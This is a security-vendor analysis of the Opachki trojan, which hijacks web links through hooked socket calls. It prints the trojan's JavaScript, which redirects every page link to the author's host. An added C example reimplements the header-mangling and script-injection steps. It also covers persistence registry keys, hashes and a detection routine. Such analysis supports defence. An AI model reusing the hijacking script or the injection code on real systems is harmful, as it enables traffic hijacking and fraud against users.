Opachki Link Hijacker Trojan Analysis | Dell SecureWorks

  • Date: November 02, 2009
  • Author: Joe Stewart, Director of Malware Research for the Counter Threat Unit (CTU)

Opachki is one of many software tools developed by criminals to hijack and monetize Windows users' search traffic using affiliate-based search engines that are ultimately advertiser-sponsored, sometimes by well-known and respected firms. Each search-hijacking-by-malware scheme that the SecureWorks Counter Threat Unit (CTU) has uncovered so far seems to have a different twist, and the Opachki trojan is no different. Instead of only hijacking search result links, Opachki attempts to hijack as many links as it can on any web page, using the visible text enclosed by each HTML anchor (the <a href=...> tag) as a faux search phrase when redirecting the user to an affiliate-based search engine.

Opachki carries out this link hijacking using a small bit of JavaScript code that is injected into the top of HTML pages. The procedure is as follows:

  1. After using the Microsoft SetWindowsHookExA API call to load its DLL into the other programs running on the system, Opachki hooks the "send" and "recv" (and the WSASend and WSARecv) socket API calls of each of those programs and redirects them to functions within Opachki's code.
  2. When Opachki detects a "send" socket request on TCP port 80, it checks the payload for the Accept-Encoding HTTP header and overwrites the first part of that header's value with a repeating character. Because the server no longer recognises a valid content coding, it returns the response uncompressed, so gzip or deflate encoding cannot defeat the script injection that follows.

    For example, an HTTP request like the following:

        GET / HTTP/1.1
        Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
        Accept-Language: en-us
        Accept-Encoding: gzip, deflate
        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
        Host: www.example.com
        Connection: Keep-Alive

    Might be changed to the following (the first nine bytes of the value, "gzip, def", have been overwritten):

        GET / HTTP/1.1
        Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
        Accept-Language: en-us
        Accept-Encoding: bbbbbbbbblate
        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
        Host: www.example.com
        Connection: Keep-Alive

  3. When a "recv" socket call completes on TCP port 80, Opachki checks whether the received data matches the wildcard pattern "*HTTP*200 OK*" (the status line of a successful HTTP response, with the wildcards absorbing the protocol version and any surrounding bytes), indicating the received buffer contains the beginning of an HTTP response.
  4. If Opachki detects the HTTP 200 response header, it then checks the buffer for the string "<HEAD>" or "</TITLE>" (case insensitive). If one of those strings is found, Opachki inserts an HTML script tag immediately after the end of the found tag. The injected tag may look like the following:

    [image: injected script tag]

  5. Additional JavaScript provided by the Opachki author is then downloaded by the browser. This JavaScript can change at any time, but the following code has been seen:

      // Rewrites every anchor on the page so that its visible text becomes a
      // search query on the Opachki author's redirector.
      function run()
      {
          var links = document.getElementsByTagName("a");
          // Redirector on the author's server; sub= and b= appear to be
          // campaign identifiers.
          var url = "http://greatfeedmillxxxxxxxxxxxx.com/?do=rphp&sub=246&b=127001";
          var q = "";

          for (var i = 0; i < links.length; i++)
          {
              // Link text with any inline tags stripped becomes the fake search phrase.
              q = links[i].innerHTML.replace(/<\/?[^>]+>/gi, '');

              // Skip empty link text and links that have already been rewritten
              // (they carry the &orig= parameter).
              if (q != "" && links[i].href.indexOf('&orig=') <= 0)
              {
                  links[i].href = url + '&q=' + escape(q) +
                                  '&orig=' + escape(links[i].href);
                  links[i].target = '_self';   // keep navigation in the current window
              }
          }
      }
      // Re-run at increasing delays to catch links added by scripts after load.
      window.setTimeout("run()", 500);
      window.setTimeout("run()", 1000);
      window.setTimeout("run()", 2000);
      window.setTimeout("run()", 3000);
      window.setTimeout("run()", 4000);
      window.setTimeout("run()", 5000);
      window.setTimeout("run()", 10000);

    The code above iterates through every anchor on the HTML page and rewrites its href to point at the malicious site, passing the link text as the "q" search parameter and the original destination as "orig"; the malicious site then handles the redirection to the affiliate search sites.

    For example, a link such as:

    [image: original link]

    would be replaced by:

    [image: rewritten link pointing at the Opachki redirector, with q= and orig= parameters]

  6. After several redirects, the user ends up viewing a search query result on one of several affiliate-based search engines that credit the Opachki author with a small amount of money if the user clicks through any of the resulting links.

    [image: affiliate search engine results page reached after the redirects]

    Opachki also hooks "send" calls to TCP port 5190, used by AOL Instant Messenger or other IM clients using the OSCAR protocol. Opachki looks for outbound messages from the client, and increments an internal counter for each sent message. The purpose of this behavior is unclear, as the counter does not appear to be used in the Opachki code. It could be a precursor to not-yet-written code that may be used to replace links in instant messages, but this is speculative.
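The send-side header overwrite and the receive-side script injection from steps 2 through 4, as an added example written for this page (it is not Opachki's code, which was never published). It works on constructed buffers with no API hooking or networking, so it runs anywhere. The nine-byte overwrite width and the "b" filler are inferred from the request sample above, the order in which "<HEAD>" and "</TITLE>" are tried is an assumption, and the script URL is a placeholder; the analysis does not state any of these.

```c
#include <ctype.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Case-insensitive search for a NUL-terminated needle inside a
 * length-delimited buffer (socket buffers are not NUL-terminated).
 * Returns the offset of the first match or -1. */
static long memcasefind(const char *hay, size_t n, const char *needle)
{
    size_t m = strlen(needle);
    if (m == 0 || m > n) return -1;
    for (size_t i = 0; i + m <= n; i++) {
        size_t j = 0;
        while (j < m && tolower((unsigned char)hay[i + j]) ==
                        tolower((unsigned char)needle[j]))
            j++;
        if (j == m) return (long)i;
    }
    return -1;
}

/* Minimal glob: '*' matches any run of bytes, everything else is literal.
 * Reproduces the "*HTTP*200 OK*" test on a received buffer. */
bool glob_match(const char *pat, const char *s, size_t n)
{
    const char *star = NULL;
    size_t i = 0, mark = 0;
    while (i < n) {
        if (*pat == '*') { star = pat++; mark = i; continue; }
        if (*pat != '\0' && *pat == s[i]) { pat++; i++; continue; }
        if (star) { pat = star + 1; i = ++mark; continue; }   /* backtrack */
        return false;
    }
    while (*pat == '*') pat++;
    return *pat == '\0';
}

/* Send side (step 2): overwrite the start of the Accept-Encoding value in
 * place so the server recognises no coding and answers uncompressed.
 * Returns the number of bytes overwritten, 0 if the header is absent.
 * ASSUMPTION: 9 bytes and 'b' come from the "gzip, deflate" ->
 * "bbbbbbbbblate" sample; the DLL's exact rule is not documented. */
size_t mangle_accept_encoding(char *req, size_t len)
{
    static const char hdr[] = "\r\nAccept-Encoding:";
    long off = memcasefind(req, len, hdr);
    if (off < 0) return 0;
    size_t v = (size_t)off + sizeof hdr - 1;
    while (v < len && req[v] == ' ') v++;                /* optional space */
    size_t end = v;
    while (end < len && req[end] != '\r' && req[end] != '\n') end++;
    size_t width = (end - v < 9) ? end - v : 9;
    memset(req + v, 'b', width);
    return width;
}

/* Receive side (steps 3-4): if the buffer starts an HTTP 200 response, copy
 * it to out with `tag` inserted right after the first "<HEAD>" or, failing
 * that, "</TITLE>" (case-insensitive). Anything else is copied through
 * untouched. Returns the output length, or -1 if out_cap is too small.
 * ASSUMPTION: the analysis does not say which tag is tried first. */
long inject_script(const char *in, size_t len, const char *tag,
                   char *out, size_t out_cap)
{
    static const char *const needles[] = { "<HEAD>", "</TITLE>" };
    size_t taglen = strlen(tag);
    long at = -1;

    if (glob_match("*HTTP*200 OK*", in, len)) {
        for (size_t k = 0; k < 2 && at < 0; k++) {
            long p = memcasefind(in, len, needles[k]);
            if (p >= 0) at = p + (long)strlen(needles[k]);
        }
    }
    if (at < 0) {                                  /* not a target: pass through */
        if (len > out_cap) return -1;
        memcpy(out, in, len);
        return (long)len;
    }
    if (len + taglen > out_cap) return -1;
    memcpy(out, in, (size_t)at);
    memcpy(out + at, tag, taglen);
    memcpy(out + at + taglen, in + at, len - (size_t)at);
    return (long)(len + taglen);
}

int main(void)
{
    /* Constructed request and response modelled on the article's sample. */
    char req[] = "GET / HTTP/1.1\r\nAccept-Encoding: gzip, deflate\r\n"
                 "Host: www.example.com\r\nConnection: Keep-Alive\r\n\r\n";
    const char resp[] = "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n"
                        "<html><head><title>t</title></head><body>x</body></html>";
    /* Placeholder URL; the article shows the real tag only as an image. */
    const char tag[] = "<script src=\"http://example.invalid/h.js\"></script>";
    char out[512];

    mangle_accept_encoding(req, sizeof req - 1);
    fputs(req, stdout);
    long n = inject_script(resp, sizeof resp - 1, tag, out, sizeof out);
    if (n >= 0) fwrite(out, 1, (size_t)n, stdout);
    return 0;
}
```

Two caveats follow directly from the logic described above and are deliberately not hidden by the example: inserting bytes into a response body lengthens it without touching Content-Length, so a browser would truncate the page unless the hook also rewrites that header or the response is chunked, and the analysis does not say how Opachki handles this; and because the "<HEAD>" search is applied to the same buffer that matched "*HTTP*200 OK*", a page whose head section arrives in a later recv call is not injected.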

Opachki Characteristics
Here is some basic information that may assist in identifying Opachki samples or traffic:

Dropper file size: 31,232 bytes
Dropper MD5 hash: 2ded7ee112cea2db509ba95dc09fded6
DLL file size: 23,552 bytes
DLL MD5 hash: 032e8fced2fbed146c30a47d4989804b
Decrypted strings: *HTTP*200 OK*, Set-cookie: xxx, Change-url:, Change-uid:, _IWMPEvents, c:\ntldrs

Most of these characteristics will change from sample to sample and are given for reference purposes only.
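Because the file hashes change from sample to sample, the most durable artifact is on the wire: an Accept-Encoding value carrying a token that is not a registered content coding. The following is an added example (not from the analysis) of that check run over constructed request headers; the list of known codings is an assumption that should be extended to match the traffic on your own network before it is used for alerting.

```c
#include <ctype.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Content codings a normal client advertises (assumed list; extend it for
 * your own traffic before deploying). */
static const char *const known_codings[] = {
    "gzip", "x-gzip", "deflate", "compress", "x-compress", "br", "identity", "*"
};

/* Case-insensitive compare of n bytes. */
static bool ieq(const char *a, const char *b, size_t n)
{
    for (size_t i = 0; i < n; i++)
        if (tolower((unsigned char)a[i]) != tolower((unsigned char)b[i]))
            return false;
    return true;
}

/* True if one comma-separated token is a known coding; a ";q=..." weight
 * and trailing whitespace are ignored. */
static bool coding_known(const char *tok, size_t n)
{
    const char *semi = memchr(tok, ';', n);
    if (semi) n = (size_t)(semi - tok);
    while (n > 0 && isspace((unsigned char)tok[n - 1])) n--;
    for (size_t k = 0; k < sizeof known_codings / sizeof *known_codings; k++)
        if (strlen(known_codings[k]) == n && ieq(known_codings[k], tok, n))
            return true;
    return false;
}

/* Walks the header block of one request and counts Accept-Encoding tokens
 * that are not known codings. 0 means clean or no such header; the Opachki
 * overwrite leaves a token such as "bbbbbbbbblate" and scores 1. */
int accept_encoding_anomalies(const char *req, size_t len)
{
    static const char name[] = "accept-encoding:";
    const size_t namelen = sizeof name - 1;
    int bad = 0;
    size_t i = 0;
    while (i < len) {
        const char *line = req + i;
        const char *eol = memchr(line, '\n', len - i);
        size_t raw = eol ? (size_t)(eol - line) + 1 : len - i;   /* incl. LF */
        size_t ll = eol ? raw - 1 : raw;                           /* excl. LF */
        if (ll > 0 && line[ll - 1] == '\r') ll--;
        if (ll == 0) break;                        /* blank line ends the headers */
        if (ll > namelen && ieq(line, name, namelen)) {
            const char *p = line + namelen, *end = line + ll;
            while (p < end) {
                while (p < end && (*p == ' ' || *p == '\t' || *p == ',')) p++;
                if (p == end) break;
                const char *comma = memchr(p, ',', (size_t)(end - p));
                const char *q = comma ? comma : end;
                if (!coding_known(p, (size_t)(q - p))) bad++;
                p = q;
            }
        }
        i += raw;
    }
    return bad;
}

int main(void)
{
    /* Constructed samples: a normal request and one rewritten by the trojan. */
    const char clean[] = "GET / HTTP/1.1\r\nHost: www.example.com\r\n"
                         "Accept-Encoding: gzip, deflate\r\n\r\n";
    const char mangled[] = "GET / HTTP/1.1\r\nHost: www.example.com\r\n"
                           "Accept-Encoding: bbbbbbbbblate\r\n\r\n";
    printf("clean: %d anomalies\n",
           accept_encoding_anomalies(clean, sizeof clean - 1));
    printf("mangled: %d anomalies\n",
           accept_encoding_anomalies(mangled, sizeof mangled - 1));
    return 0;
}
```

A hit from this check is not proof of Opachki, since any proxy or client that mangles the header would trip it, but an unknown coding sent by an ordinary browser is rare enough that it is worth an alert, and it also catches the "phone-home" traffic of other infections whose requests Opachki has altered.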

Installation
Opachki is typically installed via "drive-by" browser exploits. There is an executable dropper component that loads an embedded DLL file. The DLL installs itself in several system locations to ensure continued execution on the infected machine.

These locations are:

  • The user's Documents folder, as "ntuser.dll"
  • The user's Temp folder, as "rundll32.dll"
  • The user's Startup folder, as "scandisk.dll"
  • The system32 directory, as "calc.dll"


Using user as well as system paths ensures that the trojan will operate even if the user does not have administrator privileges on the infected machine.

Opachki uses the following registry keys to ensure the trojan DLL is loaded at boot or login time, again using both user and system accessible registry keys:

    HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
        "calc" => "rundll32.exe C:\\DOCUME~1\\Owner\\ntuser.dll,_IWMPEvents@0"

    HKEY_LOCAL_MACHINE\software\Microsoft\Windows\CurrentVersion\Run
        "calc" => "rundll32.exe C:\\WINDOWS\\system32\\calc.dll,_IWMPEvents@0"

Since the DLL is loaded into every non-console application, removing the trojan is difficult: the DLL files are in use and are regularly rewritten by the trojan. Opachki also hooks the RegDeleteValueA and RegDeleteValueW API calls and blocks deletion of any registry value that references one of the DLL names listed above. Additionally, Opachki disables the SafeBoot service configuration so that the trojan cannot be removed by booting into safe mode.

ZeuS/Zbot Removal
Perhaps one of the most curious aspects of Opachki is that it has routines dedicated to removing the ZeuS (aka Zbot, PRG) trojan from systems it infects. Opachki looks for one of several well-known ZeuS executable paths, and if found, renames the file to "C:\ntldrs", preventing ZeuS from maintaining an infection on the system.

The motivation behind this action is unclear. It could be that ZeuS hooks the "send" and "recv" calls in a similar manner to Opachki, which might disrupt Opachki's ability to inject data into HTTP streams. There is also the remote chance that the Opachki author is hijacking ZeuS installations to deploy the trojan: ZeuS has a downloader component that looks for updates at a predetermined URL, so a hacker who gained access to a ZeuS server could replace the update with their own code, piggybacking one botnet onto another. Whatever the reason, an infected user would likely benefit from having ZeuS disabled, since the criminal groups using ZeuS would no longer have the opportunity to compromise that user's financial credentials.

Side Effects
The removal of any ZeuS trojans present on the system might be a beneficial side effect of the Opachki trojan; however, there are other negative effects that result from code injection into the HTTP stream.

  • The affiliate search engines used by Opachki might be more likely to include advertising from pay-per-install malware sites, which could expose the victim's computer to becoming infected with even more malevolent trojans in the future.
  • IPS/IDS signatures that match on the exact bytes of a malware "phone-home" request might be blinded, because Opachki rewrites the Accept-Encoding header of port 80 requests sent from any hooked process, so other infections on the system might go undetected.
  • Hooking of all send/recv calls on port 80 will lead to a slight decrease in overall HTTP throughput speeds.
  • Because the possibility of HTTP response compression is disabled by Opachki, the Internet bandwidth used by the infected computer will increase, affecting download speeds to an even greater degree and possibly causing increased costs for users on metered Internet connections.

Conclusion
Opachki demonstrates that even a "benign" threat such as a search/link hijacker has additional risks and costs that sometimes go unseen. For this reason, any trojan infection should be quickly resolved. Manual removal of Opachki is extremely difficult, given the many methods it uses to maintain its code on a system. Because of these difficulties and also because of other unknown trojans, worms or viruses Opachki may have downloaded, the recommended method of removal is to reformat and reinstall the operating system from known good media.
